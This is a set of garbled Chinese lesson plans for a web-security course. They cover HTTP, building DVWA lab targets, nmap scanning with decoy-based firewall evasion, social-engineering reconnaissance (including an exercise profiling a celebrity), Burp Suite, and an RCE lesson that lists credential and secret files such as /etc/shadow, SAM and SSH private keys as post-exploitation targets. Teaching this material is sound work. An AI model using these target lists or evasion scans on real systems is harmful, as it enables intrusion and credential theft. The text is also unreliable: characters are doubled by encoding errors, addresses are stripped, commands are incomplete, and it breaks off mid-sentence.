




版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:計(jì)算機(jī)系教務(wù)處印制課次1課程類型理論項(xiàng)目(模塊)項(xiàng)目1:WEB安全基礎(chǔ)
任務(wù)1.1web安全系統(tǒng)架構(gòu)教學(xué)目標(biāo)知識(shí)目標(biāo)1.了解web安全起源2.理解web體系結(jié)構(gòu)3.掌握Web應(yīng)用安全分析能力目標(biāo)1.能對(duì)瀏覽器安全設(shè)置2.能對(duì)服務(wù)器安全配置情感目標(biāo)1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)瀏覽器安全設(shè)置服務(wù)器安全配置教學(xué)難點(diǎn)服務(wù)器安全配置教學(xué)方法演示法教學(xué)環(huán)境線上授課日期2021/3/1授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容web安全起源Web系統(tǒng)架構(gòu)&owasptop102.1Web體系架構(gòu)B/S(即Broswer/Server)解決了C/S(Client/Server)所帶來(lái)的不便,在C/S結(jié)構(gòu)的情況下,不同的服務(wù)需要安裝不同的客戶端軟件,比如QQ、迅雷、Foxmail這種情況下安裝的軟件會(huì)越來(lái)越多.B/S架構(gòu)將所有的服務(wù)都可以通過(guò)瀏覽器來(lái)完成(因?yàn)榛舅袨g覽器都安裝了瀏覽器)。但B/S也有一些不利,比如操作穩(wěn)定性、流暢度等方面相對(duì)較弱。Owasp:開源web應(yīng)用安全項(xiàng)目,是一個(gè)國(guó)際權(quán)威的安全社區(qū)。官方網(wǎng)址:10項(xiàng)最嚴(yán)重的web應(yīng)用程序安全風(fēng)險(xiǎn),這些數(shù)據(jù)包含了數(shù)以百計(jì)的組織和超過(guò)10萬(wàn)個(gè)應(yīng)用程序和api中收集的漏洞,結(jié)合了可用性,可檢測(cè)性和影響程度評(píng)估而成。3.Web應(yīng)用安全Web應(yīng)用安全體現(xiàn):(1)Web協(xié)議安全(Http)(2)WEB服務(wù)器端安全問(wèn)題(支撐軟件、應(yīng)用程序)(3)Web客戶端(瀏覽器)1.HTTP協(xié)議概述(1)http(超文本傳輸協(xié)議),1990年提出來(lái)了,當(dāng)前的版本是http1.1(2)http是一個(gè)請(qǐng)求和回應(yīng)協(xié)議:客戶端提出請(qǐng)求,服務(wù)器對(duì)請(qǐng)求給出回應(yīng)。(3)http使用的是使用TCP協(xié)議進(jìn)行連接,端口號(hào)是80(4)http請(qǐng)求方法(get,post,head,put,delete,option,trace)Get,明文傳輸,傳輸?shù)臄?shù)據(jù)顯示在地址欄,最大傳輸為2kb,Post,密文傳輸,傳輸?shù)臄?shù)據(jù)沒(méi)有限制。2.http協(xié)議安全問(wèn)題(1)信息泄漏(傳輸數(shù)據(jù)明文)(2)弱驗(yàn)證(會(huì)話雙方?jīng)]有嚴(yán)格認(rèn)證機(jī)制)http1.1提供摘要訪問(wèn)認(rèn)證機(jī)制,采用MD5將用戶名、密碼、請(qǐng)求包頭等進(jìn)行封裝,但仍然不提供對(duì)實(shí)體信息的保護(hù),無(wú)法有效解決信息泄露、數(shù)據(jù)篡改、重放攻擊等安全問(wèn)題(3)缺乏狀態(tài)跟蹤(請(qǐng)求響應(yīng)機(jī)制決定http是一個(gè)無(wú)狀態(tài)協(xié)議)Cookie+Session解決方案帶來(lái)的安全問(wèn)題3.HTTP工作機(jī)制-請(qǐng)求響應(yīng)模式3.1HTTP請(qǐng)求包含三個(gè)部分1.開始行:方法/URL協(xié)議/版本2.首部行:請(qǐng)求頭部3.實(shí)體主體:請(qǐng)求正文(一般不用)3.2HTTP響應(yīng)包含三個(gè)部分1.協(xié)議狀態(tài)代碼描述2.響應(yīng)包頭3.實(shí)體包4.http請(qǐng)求數(shù)據(jù)結(jié)構(gòu)(1)user_agent(簡(jiǎn)稱UA)(2)X-Forwarded-For(主要是為了讓web服務(wù)器獲取訪問(wèn)用戶的真實(shí)IP地址,未必真實(shí),可以偽造)(3)Referer(表示從哪兒鏈接到服務(wù)器的網(wǎng)頁(yè))(4)Content-Type(定義網(wǎng)絡(luò)文件的類型和網(wǎng)頁(yè)的編碼,用來(lái)程序間傳送內(nèi)容相關(guān)的編碼信息)(5)Accept(代表發(fā)送端希望接收的數(shù)據(jù)類型)(6)Accept-Charset(編碼)(7)Accept-Encoding(瀏覽器支持的壓縮編碼)(8)host(表示請(qǐng)求的服務(wù)器網(wǎng)址)(9)keep-Alive表示持久鏈接5.http狀態(tài)碼分類當(dāng)瀏覽器訪問(wèn)一個(gè)網(wǎng)頁(yè)時(shí),瀏覽器會(huì)向服務(wù)器發(fā)送請(qǐng)求,在瀏覽器接收并顯示網(wǎng)頁(yè)前,此頁(yè)面所在的服務(wù)器會(huì)返回一個(gè)包含http狀態(tài)碼的信息頭,用以響應(yīng)瀏覽器的請(qǐng)求。服務(wù)支撐軟件安全問(wèn)題軟件自身安全漏洞例:IIS5.0超長(zhǎng)URL拒絕服務(wù)漏洞軟件配置缺陷默認(rèn)賬號(hào)、口令不安全的配置例:IIS配置允許遠(yuǎn)程寫入應(yīng)用軟件安全問(wèn)題ApacheHTTPServer(Apache),阿帕奇安全配置只安裝所需要的組件隱藏Apahce版本不用root運(yùn)行Apache禁用目錄瀏覽設(shè)置每個(gè)連接的最大請(qǐng)求數(shù)建立專門錯(cuò)誤頁(yè)面勤打補(bǔ)丁練習(xí)與作業(yè)1.安裝IIS服務(wù)器,并做安全配置2.設(shè)置安全瀏覽器課后反思第一次接觸web安全,設(shè)計(jì)的內(nèi)容比較多,怎么樣讓學(xué)生對(duì)這門課程感興趣?注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次2課程類型理論項(xiàng)目(模塊)項(xiàng)目1:WEB安全基礎(chǔ)
任務(wù)1.2web漏洞環(huán)境搭建教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解web常見(jiàn)名詞及術(shù)語(yǔ)的含義2.掌握kaillinux安裝與msf框架的更新3.掌握web漏洞環(huán)境部署(linux、win)能力目標(biāo):1.能部署linux及windowweb漏洞環(huán)境情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)部署linux漏洞環(huán)境部署windowweb漏洞環(huán)境教學(xué)難點(diǎn)部署linux漏洞環(huán)境部署windowweb漏洞環(huán)境教學(xué)方法演示法教學(xué)環(huán)境線上授課日期2021/3/1授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容web專業(yè)術(shù)語(yǔ)1.CVE(CommonVulnerabilities&Exposures)全球漏洞編號(hào)2.exp(exploit)能夠?qū)β┒垂舻拇a。(漏洞利用)3.poc:證明漏洞存在的代碼4.payload:攻擊荷載,它是最終發(fā)送到服務(wù)器執(zhí)行的代碼5.Shellcode:用于利用軟件漏洞執(zhí)行代碼,屬于payload,是攻擊代碼最核心的就是shellcode6.webshell:web后門7.RCE:遠(yuǎn)程代碼執(zhí)行漏洞8.0day:零日漏洞。即剛被發(fā)現(xiàn)后立即被惡意利用的安全漏洞,一般來(lái)說(shuō),那些已經(jīng)被小部分人發(fā)現(xiàn),但是還未公開、還不存在安全補(bǔ)丁的漏洞。9.1day:已經(jīng)公開的新鮮漏洞(大部分機(jī)器未打補(bǔ)丁)10.Nday:公開很久的漏洞11.提權(quán):提升到管理員權(quán)限12.NVD:國(guó)家漏洞數(shù)據(jù)庫(kù)13.CNNVD:中國(guó)國(guó)家漏洞數(shù)據(jù)庫(kù)14.WAF(WebApplicationFirewall)Web應(yīng)用防火墻15.蜜罐:在主機(jī)上布置一些漏洞,誘惑攻擊者進(jìn)入,從而可以對(duì)攻擊行為進(jìn)行捕獲和分析,了解攻擊方所使用的工具與方法,推測(cè)攻擊意圖和動(dòng)機(jī),能夠讓防御方清晰地了解他們所面對(duì)的安全威脅。16.SQL:SQL注入漏洞17.XSS:跨站腳本攻擊漏洞18.CSRF:跨站請(qǐng)求偽造漏洞搭建linuxweb漏洞環(huán)境2.centos7Linux+Apache+MySQL+PHP(LAMP)Step1:配置yum源Step2:安裝apacheStpe3:安裝mysqlStep4:安裝phpStep5:測(cè)試3win搭建web環(huán)境Step1:下載phpstudy/Step2:安裝phpstudyStep3:部署dvwa漏洞環(huán)境step4:修改dvwa配置文件Step5:測(cè)試練習(xí)與作業(yè)1.部署windowweb漏洞環(huán)境2.部署linuxweb漏洞環(huán)境3.更新msf課后反思該課程設(shè)計(jì)的內(nèi)容比較多,有網(wǎng)頁(yè)設(shè)計(jì)php知識(shí),Linux操作知識(shí),如何統(tǒng)籌這些基礎(chǔ)知識(shí)?注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次3課程類型理論項(xiàng)目(模塊)項(xiàng)目1:WEB安全基礎(chǔ)
任務(wù)1.3系統(tǒng)及應(yīng)用信息收集教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解信息收集的定義,目的,分類2.了解社會(huì)工程學(xué)信息收集3.理解DNS收集的方式4.掌握nmap工具收集主機(jī)信息能力目標(biāo):1.能利用nmap工具收集系統(tǒng)及應(yīng)用信息情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)社會(huì)工程學(xué)信息收集靶機(jī)信息收集教學(xué)難點(diǎn)靶機(jī)信息收集教學(xué)方法演示法教學(xué)環(huán)境實(shí)訓(xùn)室授課日期2021/3/8授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.1信息收集定義收集目標(biāo)的情報(bào)信息是一個(gè)非常重要的環(huán)節(jié),可以大大提高滲透測(cè)試的成功性。收集滲透目標(biāo)情報(bào)一般是對(duì)目標(biāo)系統(tǒng)的分析,掃描探測(cè),服務(wù)查點(diǎn),查找對(duì)方系統(tǒng)IP等,社會(huì)工程學(xué)在滲透測(cè)試中也有經(jīng)常使用。滲透測(cè)試會(huì)盡力收集目標(biāo)系統(tǒng)的配置,whois,主機(jī)IP段,公司人員,安全防御以及防火墻等信息。1.2信息收集目的(1)黑客在攻擊之前需要收集信息,才能實(shí)時(shí)有效的攻擊。(2)安全管理員用信息收集技術(shù)來(lái)發(fā)現(xiàn)系統(tǒng)的弱點(diǎn),并進(jìn)行修補(bǔ)1.3信息收集分類(1)被動(dòng)信息收集:網(wǎng)站與服務(wù)信息:whois、DNS搜索引擎:baidu,google、社會(huì)工程學(xué)(2)主動(dòng)信息收集2.DNS信息收集方式(1)命令行查詢:nslookup,dig(2)在線查詢:/dns//(3)工具查詢:dnsenum2.社會(huì)工程學(xué)信息收集什么是社會(huì)工程學(xué)攻擊利用人性弱點(diǎn)(本能反應(yīng)、貪婪、易于信任等)進(jìn)行欺騙獲取利益的攻擊方法社會(huì)工程學(xué)的危險(xiǎn)永遠(yuǎn)有效的攻擊方法人是最不可控的因素3.1公開信息:通過(guò)社交網(wǎng)站進(jìn)行公開信息收集,比如QQ,QQ空間,微信朋友圈,微博等,能獲取到的信息有姓名、年齡、生日、星座、愛(ài)好、照片、人際交往關(guān)系,甚至郵箱、手機(jī)、住址、身份證等等隱私、敏感信息。還有一些招聘求職網(wǎng)站也往往是信息泄露最嚴(yán)重的地方。3.2社工庫(kù):是運(yùn)用社會(huì)工程學(xué)進(jìn)行攻擊的時(shí)候積累的各方面的數(shù)據(jù)結(jié)構(gòu)化數(shù)據(jù)庫(kù)。這個(gè)數(shù)據(jù)庫(kù)里有大量信息,甚至可以找到每個(gè)人的各種行為記錄,比如酒店開房記錄,個(gè)人身份證、姓名和電話號(hào)碼。4.1端口掃描簡(jiǎn)介端口掃描工具:nmap,被稱為掃描器之王。通過(guò)端口掃描確定主機(jī)開放的端口,不同的端口對(duì)應(yīng)運(yùn)行著不同的服務(wù)?;竟δ苋缦拢海?)探測(cè)一組主機(jī)是否在線(2)掃描主機(jī)端口,嗅探所提供的網(wǎng)絡(luò)服務(wù)(3)推斷主機(jī)所用的操作系統(tǒng)4.2Nmap掃描方式(1)全掃描(2)半掃描(3)隱蔽掃描(4)漏洞掃描4.3nmap常用參數(shù)(1)-sT:tcp連接掃描例:nmap–sT(2)-sS:tcpsyn掃描例:nmap-sS(3)-sU:udp掃描例:nmap-sU–p1-65535(4)-p:掃描指定端口(5)-F:快速掃描4.3nmap常用參數(shù)(5)-O:顯示操作系統(tǒng)例:nmap–O(6)-sV:顯示Banner信息例:nmap–sV(7)-v:輸出更詳細(xì)的信息例:nmap–svV(8)-oX:導(dǎo)出掃描結(jié)果到xml文件中例:nmap–oXresult.xml4.3nmap常用參數(shù)(9)-oG:導(dǎo)出掃描結(jié)果到txt文件中nmap-sV–p22,80-oG1.txt(10)-Pn:不進(jìn)行ping掃描(11)-iL:從一個(gè)文件中掃描主機(jī)列表namp–-iLip.txt(12)-exclude:掃描地址段排除某段地址namp/24–exclude00規(guī)避防火墻:用一組虛擬的地址掩蓋自己真實(shí)的IP地址,從而規(guī)避被發(fā)現(xiàn)掃描過(guò)程,可以達(dá)到一個(gè)規(guī)避防火墻的功能。例如:nmap–v–F–Pn–D05,06,ME–eeth0–g3355-Pn:不進(jìn)行ping掃描-D:使用虛擬IP地址掩蓋真實(shí)IPME:真實(shí)IP-eeth0從該網(wǎng)卡發(fā)送數(shù)據(jù)包-g3355表是自己使用某個(gè)端口靶機(jī)地址練習(xí)與作業(yè)1.收集一個(gè)自己喜歡明星的信息2.利用nmap掃描目標(biāo)靶機(jī)(metaspolist2)系統(tǒng)及應(yīng)用信息課后反思nmap工具命令的參數(shù)比較多,如何讓學(xué)生掌握常用的參數(shù)?注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次4課程類型理論項(xiàng)目(模塊)項(xiàng)目1:WEB安全基礎(chǔ)
任務(wù)1.4web漏洞信息收集教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解漏洞掃描的定義、意義2.了解常用的漏洞掃描工具3.掌握AWVScan工具的使用4.掌握brupsuite工具的使用能力目標(biāo):1.能對(duì)目標(biāo)網(wǎng)絡(luò)進(jìn)行漏洞掃描并分析2.能對(duì)目標(biāo)網(wǎng)絡(luò)進(jìn)行網(wǎng)頁(yè)抓包,改包,重放攻擊情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)AWVS掃描工具brupsuite工具的使用教學(xué)難點(diǎn)brupsuite工具的使用教學(xué)方法演示法教學(xué)環(huán)境線上授課日期2021/3/8授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.1漏洞掃描定義向目標(biāo)發(fā)送各類測(cè)試報(bào)文,根據(jù)目標(biāo)主機(jī)反饋情況判斷是否存在或可能存在某種類型的漏洞1.2漏洞掃描意義為網(wǎng)絡(luò)系統(tǒng)的加固提供先期準(zhǔn)備,進(jìn)行網(wǎng)絡(luò)安全評(píng)估被網(wǎng)絡(luò)攻擊者加以利用來(lái)獲取重要的數(shù)據(jù)信息1.3常用的漏洞掃描工具(1)網(wǎng)絡(luò)設(shè)備漏洞掃描器CiscoAuditingTools(2)集成化的漏洞掃描器NessusShadowSecurityScannereEye的RetinaInternetSecurityScanner2.1AWVS掃描工具介紹AcunetixWebVulnerabilityScanner(簡(jiǎn)稱:AWVS)是一款Web漏洞掃描程序,該應(yīng)用程序主要針對(duì)Web漏洞掃描而開發(fā)。它通過(guò)網(wǎng)絡(luò)爬蟲測(cè)試你的網(wǎng)站安全,檢測(cè)流行安全漏洞。AWVS是一個(gè)自動(dòng)化的web應(yīng)用程序安全測(cè)試工具,AWVS可以通過(guò)SQL注入攻擊漏洞、跨站腳本漏洞等來(lái)審核web應(yīng)用程序的安全性。BurpSuite是用于攻擊web應(yīng)用程序的集成平臺(tái)。常用的功能:抓包、重放、爆破3.1Burpsutie工具安裝使用1.在win環(huán)境下,需要首先安裝java環(huán)境2.下載地址:/burp/communitydownload3.在kailinux環(huán)境下,輸入burpsuite啟動(dòng)該工具Proxy是一個(gè)攔截http/https的代理服務(wù)器,作為一個(gè)在瀏覽器和目標(biāo)應(yīng)用程序之間的中間人,允許你攔截、查看、修改在兩個(gè)方向上的原始數(shù)據(jù)。練習(xí)與作業(yè)1.使用AWVScan掃描目標(biāo)網(wǎng)站漏洞并分析2.使用brupsuite抓包并進(jìn)行分析課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次5課程類型實(shí)踐項(xiàng)目(模塊)實(shí)踐1:win系統(tǒng)環(huán)境安全設(shè)置教學(xué)目標(biāo)知識(shí)目標(biāo)1.了解web安全起源2.理解web體系結(jié)構(gòu)3.掌握Web應(yīng)用安全分析能力目標(biāo)1.能對(duì)瀏覽器安全設(shè)置2.能對(duì)服務(wù)器安全配置情感目標(biāo)1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)win系統(tǒng)環(huán)境安全設(shè)置教學(xué)難點(diǎn)win系統(tǒng)環(huán)境安全設(shè)置教學(xué)方法演示法教學(xué)環(huán)境機(jī)房授課日期2021/3/15授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容瀏覽器安全設(shè)置360殺毒軟件安全設(shè)置賬戶密碼安全設(shè)置練習(xí)與作業(yè)Windows系統(tǒng)環(huán)境安全設(shè)置課后反思如何設(shè)置手機(jī)的安全基線?注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次6課程類型實(shí)踐項(xiàng)目(模塊)實(shí)踐2:web漏洞環(huán)境搭建教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解web常見(jiàn)名詞及術(shù)語(yǔ)的含義2.掌握kaillinux安裝與msf框架的更新3.掌握web漏洞環(huán)境部署(linux、win)能力目標(biāo):1.能部署linux及windowweb漏洞環(huán)境情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)部署linux漏洞環(huán)境部署windowweb漏洞環(huán)境教學(xué)難點(diǎn)部署linux漏洞環(huán)境部署windowweb漏洞環(huán)境教學(xué)方法演示法教學(xué)環(huán)境線上授課日期2021/3/15授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.centos7Linux+Apache+MySQL+PHP(LAMP)Step1:配置yum源Step2:安裝apacheStpe3:安裝mysqlStep4:安裝phpStep5:測(cè)試練習(xí)與作業(yè)搭建windows漏洞環(huán)境課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次7課程類型實(shí)踐項(xiàng)目(模塊)實(shí)踐3:nmap工具應(yīng)用教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解信息收集的定義,目的,分類2.了解社會(huì)工程學(xué)信息收集3.理解DNS收集的方式4.掌握nmap工具收集主機(jī)信息能力目標(biāo):1.能利用nmap工具收集系統(tǒng)及應(yīng)用信息情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)社會(huì)工程學(xué)信息收集靶機(jī)信息收集教學(xué)難點(diǎn)靶機(jī)信息收集教學(xué)方法演示法教學(xué)環(huán)境實(shí)訓(xùn)室授課日期2021/3/22授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容掌握nmap工具常用參數(shù)使用利用nmap工具手機(jī)靶機(jī)漏洞信息練習(xí)與作業(yè)課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次8課程類型實(shí)踐項(xiàng)目(模塊)實(shí)踐4:brupsuite工具應(yīng)用教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解漏洞掃描的定義、意義2.了解常用的漏洞掃描工具3.掌握AWVScan工具的使用4.掌握brupsuite工具的使用能力目標(biāo):1.能對(duì)目標(biāo)網(wǎng)絡(luò)進(jìn)行漏洞掃描并分析2.能對(duì)目標(biāo)網(wǎng)絡(luò)進(jìn)行網(wǎng)頁(yè)抓包,改包,重放攻擊情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)AWVS掃描工具brupsuite工具的使用教學(xué)難點(diǎn)brupsuite工具的使用教學(xué)方法演示法教學(xué)環(huán)境線上授課日期2021/3/22授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容nmap常用參數(shù)利用nmap工具收集.6靶機(jī)上的漏洞信息利用awvs工具收集網(wǎng)頁(yè)上的信息練習(xí)與作業(yè)課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次9課程類型理論項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
任務(wù)2.1RCE漏洞教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解RCE漏洞的定義、分類2.掌握遠(yuǎn)程系統(tǒng)命令執(zhí)行漏洞利用與加固3.掌握遠(yuǎn)程代碼執(zhí)行漏洞利用與加固能力目標(biāo):1.具有利用RCE漏洞獲取系統(tǒng)權(quán)限的能力情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)掌握遠(yuǎn)程系統(tǒng)命令執(zhí)行漏洞利用教學(xué)難點(diǎn)掌握遠(yuǎn)程系統(tǒng)命令執(zhí)行漏洞加固教學(xué)方法演示法教學(xué)環(huán)境教學(xué)樓授課日期2021/3/29授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.1RCE漏洞定義RCE(remotecommand/codeexecute),RCE漏洞可以讓攻擊者直接向后臺(tái)服務(wù)器遠(yuǎn)程注入操作系統(tǒng)命令或者代碼,從而控制后臺(tái)系統(tǒng)。1.2RCE漏洞的危害RCE漏洞的危害跟web中間件運(yùn)行的權(quán)限有關(guān)。由于web應(yīng)用運(yùn)行在web中間件上,所以web應(yīng)用會(huì)“繼承”web中間件的運(yùn)行權(quán)限。如果存在RCE漏洞的web應(yīng)用運(yùn)行在以系統(tǒng)管理員身份運(yùn)行的web中間件上,那么黑客就相當(dāng)于擁有一個(gè)管理員權(quán)限的shell,如果中間件權(quán)限分配過(guò)大,黑客就可以控制web服務(wù)器。黑客可以利用漏洞任意的執(zhí)行權(quán)限允許的命令,比如,查看系統(tǒng)敏感信息,添加管理員,反彈shell,下載并運(yùn)行惡意代碼等。1.3敏感信息--Windows敏感信息C:\boot.ini//查看系統(tǒng)版本C:\Windows\System32\inetsrv\MetaBase.xml//IIS配置文件C:\Windows\repair\sam//存儲(chǔ)系統(tǒng)初次安裝的密碼C:\ProgramFiles\mysql\my.ini//Mysql配置C:\ProgramFiles\mysql\data\mysql\user.MYD//MysqlrootC:\Windows\php.ini//php配置信息C:\Windows\my.ini//Mysql配置信息1.3敏感信息--Linux敏感信息:/root/.ssh/id_rsa/root/.ssh/id_ras.keystore/root/.ssh/known_hosts//記錄每個(gè)訪問(wèn)計(jì)算機(jī)用戶的公鑰/etc/passwd、/etc/shadow/etc/f//mysql配置文件/etc/httpd/conf/httpd.conf//apache配置文件/root/.bash_history//用戶歷史命令記錄文件/root/.mysql_history//mysql歷史命令記錄文件1.4RCE漏洞分類:(1)遠(yuǎn)程系統(tǒng)命令執(zhí)行漏洞(2)遠(yuǎn)程代碼執(zhí)行漏洞2.1遠(yuǎn)程系統(tǒng)命令執(zhí)行漏洞
一般出現(xiàn)這種漏洞,是因?yàn)閼?yīng)用系統(tǒng)從設(shè)計(jì)上需要給用戶提供指定的遠(yuǎn)程命令操作的接口,比如我們常見(jiàn)的路由器、防火墻、入侵檢測(cè)等設(shè)備的web管理界面上一般會(huì)給用戶提供一個(gè)ping操作的web界面,用戶從web界面輸入目標(biāo)IP,提交后,后臺(tái)會(huì)對(duì)該IP地址進(jìn)行一次ping測(cè)試,并返回測(cè)試結(jié)果。但是設(shè)計(jì)者在完成該功能時(shí),沒(méi)有做嚴(yán)格的安全控制,則可能會(huì)導(dǎo)致攻擊者通過(guò)該接口提交“意想不到”的命令,從而讓后臺(tái)進(jìn)行執(zhí)行,從而控制整個(gè)后臺(tái)服務(wù)器。2.2命令執(zhí)行漏洞原理命令執(zhí)行漏洞的本質(zhì)是由于系統(tǒng)把用戶輸入進(jìn)來(lái)的參數(shù)當(dāng)成了要執(zhí)行的命令,并且這些命令被執(zhí)行了,這樣就造成了命令注執(zhí)行漏洞。命令執(zhí)行漏洞產(chǎn)生的原因有兩點(diǎn)(1)web網(w